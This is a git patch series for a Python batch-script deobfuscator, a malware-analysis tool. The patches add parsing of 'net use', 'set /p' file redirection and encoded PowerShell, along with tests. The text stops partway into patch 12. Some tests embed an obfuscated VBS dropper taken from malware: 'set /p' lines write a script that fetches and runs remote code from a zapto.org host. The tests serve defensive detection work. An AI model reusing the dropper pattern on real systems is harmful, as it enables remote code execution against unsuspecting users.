From e8a9ed37c35a034024b0e7329c1748125d09b9f6 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Tue, 2 Jan 2024 19:54:08 +0000 Subject: [PATCH 01/17] Handle net-use --- batch_deobfuscator/batch_interpreter.py | 45 +++++++++++++++++++++++-- 1 file changed, 43 insertions(+), 2 deletions(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index e15275c..7596dab 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -307,7 +307,6 @@ def get_commands(self, logical_line): yield part def get_value(self, variable): - str_substitution = ( r"([%!])(?P[\"^|!\w#$'()*+,-.?@\[\]`{}~\s+]+)" r"(" @@ -623,6 +622,46 @@ def interpret_copy(self, cmd): self.traits["windows-util-manipulation"].append((cmd, {"src": src, "dst": dst})) self.modified_filesystem[dst.lower()] = {"type": "file", "src": src} + def interpret_net(self, cmd): + if cmd[:7].lower() != "net use": + # Started with "net" but not "net use", strange but not what we're interested into + return + r""" + net use + [{ | *}] + [\\\[\]] + [{ | *}]] + [/user:[\] + [/user:[\]] + [/user: [] + [/savecred] + [/smartcard] + [{/delete | /persistent:{yes | no}}] + net use [ [/home[{ | *}] [/delete:{yes | no}]] + net use [/persistent:{yes | no}] + """ + split_cmd = cmd.split() + if len(split_cmd) <= 2 or split_cmd[2] == "*" or split_cmd[2][:2].lower() == "/p": + # Maybe a "net use * /d /y" or a "net use /persistent:yes" + return + + info = {"devicename": split_cmd[2], "server": split_cmd[3]} + for param in split_cmd[4:]: + if param.startswith("/sa"): + continue + elif param.startswith("/sm"): + continue + elif param.startswith("/d"): + continue + elif param.startswith("/p"): + continue + elif param.startswith("/u"): + info["user"] = param.split(":", 1)[1] + continue + info["password"] = param + + self.traits["net-use"].append((cmd, info)) + def interpret_command(self, normalized_comm): if 
line_is_comment(normalized_comm): return @@ -724,6 +763,9 @@ def interpret_command(self, normalized_comm): if command == "copy": self.interpret_copy(normalized_comm) + if command == "net": + self.interpret_net(normalized_comm) + def valid_percent_tilde(self, argument): return argument == "%" or (argument.startswith("%~") and all(x in "fdpnxsatz" for x in argument[2:])) @@ -1063,7 +1105,6 @@ def handle_bat_file(deobfuscator, fpath): deobfuscator = BatchDeobfuscator() if args[0].file is not None: - file_path = args[0].file for logical_line in deobfuscator.read_logical_line(args[0].file): From 58dadfd6339d415a7f026ed71b4a9a146160e05b Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Tue, 30 Jan 2024 15:39:43 +0000 Subject: [PATCH 02/17] Do not handle net user --- batch_deobfuscator/batch_interpreter.py | 4 ++-- tests/test_net.py | 11 +++++++++++ 2 files changed, 13 insertions(+), 2 deletions(-) create mode 100644 tests/test_net.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 7596dab..3bacdad 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -623,8 +623,8 @@ def interpret_copy(self, cmd): self.modified_filesystem[dst.lower()] = {"type": "file", "src": src} def interpret_net(self, cmd): - if cmd[:7].lower() != "net use": - # Started with "net" but not "net use", strange but not what we're interested into + if cmd[:7].lower() != "net use" or cmd[:8].lower() == "net user": + # Started with "net" but not "net use", not what we're interested into return r""" net use diff --git a/tests/test_net.py b/tests/test_net.py new file mode 100644 index 0000000..8349cb0 --- /dev/null +++ b/tests/test_net.py @@ -0,0 +1,11 @@ +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +def test_net_user(): + deobfuscator = BatchDeobfuscator() + deobfuscator.interpret_command("net user") + assert len(deobfuscator.traits) == 0 + 
deobfuscator.interpret_command("net user guest") + assert len(deobfuscator.traits) == 0 + deobfuscator.interpret_command("net user administrator") + assert len(deobfuscator.traits) == 0 From 2a01dd291cc1ec3c86627211b503038a612138a5 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Wed, 21 Feb 2024 12:39:05 +0000 Subject: [PATCH 03/17] Handle powershell command without argument --- batch_deobfuscator/batch_interpreter.py | 3 +++ tests/test_powershell.py | 1 + 2 files changed, 4 insertions(+) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 3bacdad..8b35e9f 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -500,6 +500,9 @@ def interpret_powershell(self, normalized_comm): # Assume the first element is the call to powershell cmd = normalized_comm.split()[1:] + if len(cmd) == 0: + return + if cmd[0].lower() in ["invoke-webrequest", "iwr"]: # Parse this more similarly to curl than proper powershell args, unknown = self.powershell_invoke_webrequest_parser.parse_known_args(cmd[1:]) diff --git a/tests/test_powershell.py b/tests/test_powershell.py index be84221..5a7dd1e 100644 --- a/tests/test_powershell.py +++ b/tests/test_powershell.py @@ -36,6 +36,7 @@ "powershell -Command \"& {get-process onedrive | add-member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated}\" > \"%WORKINGDIRONEDRIVE%\\OneDriveElevated.txt\"", b"& {get-process onedrive | add-member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated}", ), + ("powershell", None), ], ) def test_extract_powershell(statement, extracted_ps1): From 2d0dd283eb52344ec8c46edb89926640c942c4ea Mon Sep 17 00:00:00 2001 From: 
gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Mon, 11 Mar 2024 19:51:09 +0000 Subject: [PATCH 04/17] Better setp redirector handling --- batch_deobfuscator/batch_interpreter.py | 53 ++++++++------- tests/test_setp.py | 85 +++++++++++++++++++++++++ tests/test_unittests.py | 16 ----- 3 files changed, 116 insertions(+), 38 deletions(-) create mode 100644 tests/test_setp.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 8b35e9f..2b3ade3 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -17,6 +17,7 @@ ENC_RE = rb"(?i)(?:-|/)e(?:c|n(?:c(?:o(?:d(?:e(?:d(?:c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?)?)?)?)?)?)?)?$" PWR_CMD_RE = rb"(?i)(?:-|/)c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?$" PWR_FILE_RE = rb"(?i)(?:-|/)f(?:i(?:l(?:e?)?)?)?$" +REDIRECTORS_RE = r"\s*(<|\d?>>?)\s*(\"(?:[^\"]|\"\"|\^\")+\"|[^\s><]+)" # Gathered from https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2 RARE_LOLBAS = [ @@ -380,6 +381,8 @@ def interpret_set(self, cmd): elif char == "^": old_state = state state = "escape" + elif char == "=": + state = "value" else: state = "var" var_name += char @@ -436,31 +439,37 @@ def interpret_set(self, cmd): var_value = f"({var_value.strip(' ')})" elif option == "p": last_quote_index = max(var_value.rfind("'"), var_value.rfind('"')) - set_in = var_value.rfind("<") - set_out = var_value.rfind(">") - - if set_out != -1 and set_out > last_quote_index: - file_redirect = var_value[set_out:].lstrip(">").strip() - content = var_value[:set_out].strip() - if set_in != -1 and set_in < set_out: - content = var_value[:set_in].strip() - elif set_in > set_out: - file_redirect = file_redirect[: set_in - set_out - 1] - if content[0] == content[-1] in ["'", '"']: - content = content[1:-1].strip() - file_redirect = file_redirect.strip() - self.modified_filesystem[file_redirect.lower()] = {"type": "content", "content": content} - 
self.traits["setp-file-redirection"].append((cmd, file_redirect)) - - if set_in == -1 or set_in < last_quote_index: + file_redirect = None + file_input = None + redirectors_string = var_value[last_quote_index + 1 :].strip() + if redirectors_string: + while redirector := re.match(REDIRECTORS_RE, redirectors_string): + if redirector.group(1) in ["1>", ">"]: + file_redirect = redirector.group(2).strip() + file_redirect_append = False + elif redirector.group(1) in ["1>>", ">>"]: + file_redirect = redirector.group(2).strip() + file_redirect_append = True + elif redirector.group(1) == "<": + file_input = redirector.group(2).strip() + redirectors_string = redirectors_string[redirector.end() :] + + if file_redirect: + content = var_value[: last_quote_index + 1].strip() + if content and file_redirect != "nul": + if content[0] == content[-1] in ["'", '"']: + content = content[1:-1] + if file_redirect_append: + if file_redirect.lower() in self.modified_filesystem: + content = f"{self.modified_filesystem[file_redirect.lower()]['content']}{content}" + self.modified_filesystem[file_redirect.lower()] = {"type": "content", "content": content} + self.traits["setp-file-redirection"].append((f"set{cmd}", file_redirect)) + + if file_input is None: var_value = "__input__" else: # We can recover the value right away - actual_value = var_value[set_in:].lstrip("<") - if set_out > set_in: - actual_value = actual_value[: set_out - set_in - 1] - actual_value = actual_value.strip() - if actual_value == "nul": + if file_input.strip() == "nul": var_value = "" else: # We could get a value from the redirection, but for the moment we'll leave it generic diff --git a/tests/test_setp.py b/tests/test_setp.py new file mode 100644 index 0000000..9226952 --- /dev/null +++ b/tests/test_setp.py @@ -0,0 +1,85 @@ +import pytest + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +@pytest.mark.parametrize( + "cmd, fs", + [ + ('set/p str="a"a" "out.txt', ["out.txt"]), + ('set/p str="a"a" 
"OUt.tXt', ["out.txt"]), + ('set/p str="a"a" ">out.txtout.txt', ["out.txt"]), + ('set/p str="a"a" " out.txt', ["out.txt"]), + ], +) +def test_set_redirection(cmd, fs): + deobfuscator = BatchDeobfuscator() + deobfuscator.interpret_command(cmd) + assert list(deobfuscator.modified_filesystem.keys()) == fs + if fs: + assert deobfuscator.modified_filesystem["out.txt"]["content"] == 'a"a" ' + + +def test_create_append_file(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p="OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb" 1>C:\Users\Public\\Xdg72.vbs' + cmd2 = r'set /p="ject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")^">>C:\Users\Public\\Xdg72.vbs' + deobfuscator.interpret_command(cmd1) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 1 + assert deobfuscator.traits["setp-file-redirection"][0] == ( + cmd1, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb', + } + deobfuscator.interpret_command(cmd2) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 2 + assert deobfuscator.traits["setp-file-redirection"][1] == ( + cmd2, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetObject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")', + } + + +def test_create_append_file_with_stderr(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p="OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb" 1>C:\Users\Public\\Xdg72.vbs 2>nul' + cmd2 = r'set 
/p="ject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")^">>C:\Users\Public\\Xdg72.vbs 2>nul' + deobfuscator.interpret_command(cmd1) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 1 + assert deobfuscator.traits["setp-file-redirection"][0] == ( + cmd1, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb', + } + deobfuscator.interpret_command(cmd2) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 2 + assert deobfuscator.traits["setp-file-redirection"][1] == ( + cmd2, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetObject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")', + } + + +def test_empty_content(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p pidvalue=<"C:\TEMP\~pid.txt" >nul 2>nul' + deobfuscator.interpret_command(cmd1) + assert deobfuscator.variables["pidvalue"] == "__input__" diff --git a/tests/test_unittests.py b/tests/test_unittests.py index ac2c4fb..07cfdfc 100644 --- a/tests/test_unittests.py +++ b/tests/test_unittests.py @@ -720,22 +720,6 @@ def test_anti_recursivity_with_quotes(): assert cmd2 == 'echo a\\"a' - @staticmethod - @pytest.mark.parametrize( - "cmd, fs", - [ - ('set/p str="a"a" "out.txt', ["out.txt"]), - ('set/p str="a"a" "OUt.tXt', ["out.txt"]), - ('set/p str="a"a" ">out.txtout.txt', ["out.txt"]), - ('set/p str="a"a" " Date: Thu, 14 Mar 2024 18:06:28 +0000 Subject: [PATCH 05/17] Net use without devicename --- batch_deobfuscator/batch_interpreter.py | 36 ++++++++--- tests/test_net.py | 79 +++++++++++++++++++++++++ 2 files 
changed, 107 insertions(+), 8 deletions(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 2b3ade3..d1d1161 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -657,20 +657,40 @@ def interpret_net(self, cmd): # Maybe a "net use * /d /y" or a "net use /persistent:yes" return - info = {"devicename": split_cmd[2], "server": split_cmd[3]} - for param in split_cmd[4:]: - if param.startswith("/sa"): + info = {"options": []} + extra_params = [] + for param in split_cmd[2:]: + param_lowercase = param.lower() + if param_lowercase.startswith("/sa"): + info["options"].append("savecred") continue - elif param.startswith("/sm"): + elif param_lowercase.startswith("/sm"): + info["options"].append("smartcard") continue - elif param.startswith("/d"): + elif param_lowercase.startswith("/d"): + info["options"].append("delete") continue - elif param.startswith("/p"): + elif param_lowercase.startswith("/p"): + info["options"].append("persistent") continue - elif param.startswith("/u"): + elif param_lowercase.startswith("/u"): info["user"] = param.split(":", 1)[1] continue - info["password"] = param + + extra_params.append(param) + + if extra_params[0] == "*" or re.match(r"\w:$", extra_params[0]): + info["devicename"] = extra_params.pop(0) + if extra_params: + info["server"] = extra_params.pop(0) + if extra_params: + info["password"] = extra_params.pop(0) + + if extra_params: + raise Exception(f"Too many parameters in net use: '{cmd}'") + + if not info["options"]: + info.pop("options") self.traits["net-use"].append((cmd, info)) diff --git a/tests/test_net.py b/tests/test_net.py index 8349cb0..717e353 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -9,3 +9,82 @@ def test_net_user(): assert len(deobfuscator.traits) == 0 deobfuscator.interpret_command("net user administrator") assert len(deobfuscator.traits) == 0 + + +def test_net_use_user_password(): + deobfuscator = 
BatchDeobfuscator() + cmd = "net use Q: https://webdav.site.com passw'd /user:username@site.com" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "Q:", + "server": "https://webdav.site.com", + "password": "passw'd", + "user": "username@site.com", + }, + ) + + +def test_net_use_user(): + deobfuscator = BatchDeobfuscator() + cmd = r"net use d: \\server\share /user:Accounts\User1" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "d:", + "server": r"\\server\share", + "user": r"Accounts\User1", + }, + ) + + +def test_net_use_no_devicename(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE C:\TEMP\STUFF" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + print(deobfuscator.traits) + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "server": r"C:\TEMP\STUFF", + }, + ) + + +def test_net_use_delete(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE X: /DELETE" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "X:", + "options": ["delete"], + }, + ) + + +def test_net_use_delete_with_server(): + deobfuscator = BatchDeobfuscator() + cmd = r"net use f: \\financial\public /delete" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "f:", + "server": r"\\financial\public", + "options": ["delete"], + }, + ) From 998dcfdfab9e801c7634f8e4ec8664c0900b61de Mon Sep 17 00:00:00 2001 From: 
gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 14 Mar 2024 18:54:58 +0000 Subject: [PATCH 06/17] Handle corrupted rundll32 calls without following dll name --- batch_deobfuscator/batch_interpreter.py | 7 ++++++- tests/test_rundll.py | 8 ++++++++ 2 files changed, 14 insertions(+), 1 deletion(-) create mode 100644 tests/test_rundll.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index d1d1161..d56b024 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -588,8 +588,13 @@ def interpret_mshta(self, cmd): def interpret_rundll32(self, cmd): # The command is supposed to be split on "," but we're getting rid of them earlier. - # If we every fix the loss of commas, we need to fix this split. + # If we ever fix the loss of commas, we need to fix this split. split_cmd = cmd.split(" ") + + if len(split_cmd) == 1: + # Rundll call without a dll, probably from a corrupted file + return + if split_cmd[1].lower() in self.modified_filesystem: rundll_struct = {} if self.modified_filesystem[split_cmd[1].lower()]["type"] == "download": diff --git a/tests/test_rundll.py b/tests/test_rundll.py new file mode 100644 index 0000000..f805bd0 --- /dev/null +++ b/tests/test_rundll.py @@ -0,0 +1,8 @@ +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +def test_dry_rundll32(): + deobfuscator = BatchDeobfuscator() + cmd = r"$WINSYSDIR$\RunDLL32.exe" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 0 From 298dae6bfca59b7006493636f3411636bf6013b8 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Tue, 26 Mar 2024 18:51:50 +0000 Subject: [PATCH 07/17] Avoid corrupted net use calls --- batch_deobfuscator/batch_interpreter.py | 7 +++++++ tests/test_net.py | 11 +++++++++++ 2 files changed, 18 insertions(+) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 
d56b024..3d2331d 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -684,6 +684,13 @@ def interpret_net(self, cmd): extra_params.append(param) + if not extra_params: + # Probably something like + # net use %UNKNOWN_VAR% /delete + # Which gets resolved to + # net use /delete + return + if extra_params[0] == "*" or re.match(r"\w:$", extra_params[0]): info["devicename"] = extra_params.pop(0) if extra_params: diff --git a/tests/test_net.py b/tests/test_net.py index 717e353..3b3819d 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -88,3 +88,14 @@ def test_net_use_delete_with_server(): "options": ["delete"], }, ) + + +def test_net_use_missing_var(): + # Probably something like + # net use %UNKNOWN_VAR% /delete + # Which gets resolved to + # net use /delete + deobfuscator = BatchDeobfuscator() + cmd = r"net use /delete" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 0 From cc5f8aef5b6dc63cbc638e9b3da133781b16fa3f Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 4 Apr 2024 16:54:25 +0000 Subject: [PATCH 08/17] Handle redirection in net use commands --- batch_deobfuscator/batch_interpreter.py | 21 ++++++++- tests/test_net.py | 62 +++++++++++++++++++++++++ 2 files changed, 81 insertions(+), 2 deletions(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 3d2331d..5ecc959 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -665,6 +665,10 @@ def interpret_net(self, cmd): info = {"options": []} extra_params = [] for param in split_cmd[2:]: + if any(param.startswith(x) for x in [">", ">>", "1>", "1>>", "2>", "2>>"]): + # We reached the redirection part of the command + break + param_lowercase = param.lower() if param_lowercase.startswith("/sa"): info["options"].append("savecred") @@ -673,14 +677,27 @@ def interpret_net(self, cmd): 
info["options"].append("smartcard") continue elif param_lowercase.startswith("/d"): - info["options"].append("delete") + if ":" in param_lowercase and param_lowercase.split(":", 1)[1].startswith("n"): + info["options"].append("not-delete") + else: + info["options"].append("delete") continue elif param_lowercase.startswith("/p"): - info["options"].append("persistent") + if ":" in param_lowercase and param_lowercase.split(":", 1)[1].startswith("n"): + info["options"].append("not-persistent") + else: + info["options"].append("persistent") continue elif param_lowercase.startswith("/u"): info["user"] = param.split(":", 1)[1] continue + # /y and /n looks to be undocumented confirmation silent responses + elif param_lowercase.startswith("/y"): + info["options"].append("auto-accept") + continue + elif param_lowercase.startswith("/n"): + info["options"].append("auto-decline") + continue extra_params.append(param) diff --git a/tests/test_net.py b/tests/test_net.py index 3b3819d..417519c 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -1,3 +1,5 @@ +import tempfile + from batch_deobfuscator.batch_interpreter import BatchDeobfuscator @@ -73,6 +75,18 @@ def test_net_use_delete(): }, ) + cmd = r"NET USE U: /DELETE /y" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 2 + assert deobfuscator.traits["net-use"][1] == ( + cmd, + { + "devicename": "U:", + "options": ["delete", "auto-accept"], + }, + ) + def test_net_use_delete_with_server(): deobfuscator = BatchDeobfuscator() @@ -99,3 +113,51 @@ def test_net_use_missing_var(): cmd = r"net use /delete" deobfuscator.interpret_command(cmd) assert len(deobfuscator.traits) == 0 + + +def test_net_use_redirect(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE U: \\server\files >> output.log" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert 
deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "U:", + "server": r"\\server\files", + }, + ) + + +def test_net_use_script(): + deobfuscator = BatchDeobfuscator() + script = rb""" +net use w: /delete >nul 2>nul +if not exist w: ( + net use w: \\server\files /Persistent:NO >nul 2>nul + ) +""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + deobfuscator.analyze(tf.name, temp_dir) + + assert "net-use" in deobfuscator.traits + assert len(deobfuscator.traits["net-use"]) == 2 + assert deobfuscator.traits["net-use"][0] == ( + r"net use w: /delete >nul 2>nul", + { + "devicename": "w:", + "options": ["delete"], + }, + ) + assert deobfuscator.traits["net-use"][1] == ( + r"net use w: \\server\files /Persistent:NO >nul 2>nul", + { + "devicename": "w:", + "server": r"\\server\files", + "options": ["not-persistent"], + }, + ) From 9af44496274954f1e466cad104a190ad459df435 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 2 May 2024 17:09:21 +0000 Subject: [PATCH 09/17] Handle piping into powershell -Encoded --- batch_deobfuscator/batch_interpreter.py | 6 ++++++ tests/test_powershell.py | 4 ++++ 2 files changed, 10 insertions(+) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 5ecc959..829b660 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -522,6 +522,12 @@ def interpret_powershell(self, normalized_comm): for idx, part in enumerate(cmd): if re.match(ENC_RE, part.encode()): + if len(cmd) == idx + 1: + # We do not have more arguments + # This my be caused by a script that does + # echo cHdk | powershell -Encoded + break + if cmd[idx + 1][0] in ["'", '"']: last_part = idx + 1 for i in range(last_part, len(cmd)): diff --git a/tests/test_powershell.py b/tests/test_powershell.py index 5a7dd1e..a1947be 100644 --- 
a/tests/test_powershell.py +++ b/tests/test_powershell.py @@ -1,3 +1,5 @@ +import tempfile + import pytest from batch_deobfuscator.batch_interpreter import BatchDeobfuscator @@ -37,6 +39,8 @@ b"& {get-process onedrive | add-member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated}", ), ("powershell", None), + # echo cHdk | powershell -Encoded + ("powershell -Encoded", None), ], ) def test_extract_powershell(statement, extracted_ps1): From 44268549a655449c42118309212b8182aa6fbac7 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Wed, 15 May 2024 19:21:03 +0000 Subject: [PATCH 10/17] Handle infinite recursion in variable expansion --- batch_deobfuscator/batch_interpreter.py | 7 ++++++- tests/test_variables.py | 21 +++++++++++++++++++++ 2 files changed, 27 insertions(+), 1 deletion(-) create mode 100644 tests/test_variables.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 829b660..26560f4 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -1032,7 +1032,12 @@ def normalize_command(self, command): def analyze_logical_line(self, logical_line, working_directory, f, extracted_files): commands = self.get_commands(logical_line) for command in commands: - normalized_comm = self.normalize_command(command) + try: + normalized_comm = self.normalize_command(command) + except RecursionError: + # If a variable contains itself, we will recurse infinitly to expand it + normalized_comm = command + if len(list(self.get_commands(normalized_comm))) > 1: self.traits["command-grouping"].append({"Command": command, "Normalized": normalized_comm}) self.analyze_logical_line(normalized_comm, working_directory, f, extracted_files) diff --git a/tests/test_variables.py b/tests/test_variables.py new file mode 100644 index 
0000000..6a502cb --- /dev/null +++ b/tests/test_variables.py @@ -0,0 +1,21 @@ +import tempfile + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +# Taken from 675228b0360a56b2d3ed661635de4359d72089cb0e089eb60961727706797751 +# A Grub file that contains a batch script +# The value for the variable in_check contain itself, so it create an infinite recursion when expanding it +def test_in_check_infinite_recursion(): + deobfuscator = BatchDeobfuscator() + script = rb""" +if "%back%"=="" || set back= && set filefnd= && set in_check= ! call Fn.11 "%in_check%" "1" && exit +call Fn.11 "%in_check%" "1" && exit 1 +""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + deobfuscator.analyze(tf.name, temp_dir) + + # No assert, just making sure it does not error out. From dab3c667c468bcc91d72963775734242e56158bb Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Wed, 22 May 2024 17:47:46 +0000 Subject: [PATCH 11/17] Handle spaces in net use by using shlex --- batch_deobfuscator/batch_interpreter.py | 5 ++++- tests/test_net.py | 16 ++++++++++++++++ 2 files changed, 20 insertions(+), 1 deletion(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 26560f4..21d7a12 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -670,11 +670,14 @@ def interpret_net(self, cmd): info = {"options": []} extra_params = [] - for param in split_cmd[2:]: + for param in shlex.split(cmd, posix=False)[2:]: if any(param.startswith(x) for x in [">", ">>", "1>", "1>>", "2>", "2>>"]): # We reached the redirection part of the command break + if param[0] == param[-1] and param[0] in ["'", '"']: + param = param[1:-1] + param_lowercase = param.lower() if param_lowercase.startswith("/sa"): info["options"].append("savecred") diff --git a/tests/test_net.py 
b/tests/test_net.py index 417519c..2b27846 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -130,6 +130,22 @@ def test_net_use_redirect(): ) +def test_net_use_space(): + deobfuscator = BatchDeobfuscator() + cmd = r'net use g: "\\server.local\some\path\to\a nice folder" /user:domain\username' + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "g:", + "server": r"\\server.local\some\path\to\a nice folder", + "user": r"domain\username", + }, + ) + + def test_net_use_script(): deobfuscator = BatchDeobfuscator() script = rb""" From 407941e3d2d59aeca174a5d81af494210c310221 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 23 May 2024 20:17:20 +0000 Subject: [PATCH 12/17] Fix lost space in certain obfuscated scripts --- batch_deobfuscator/batch_interpreter.py | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 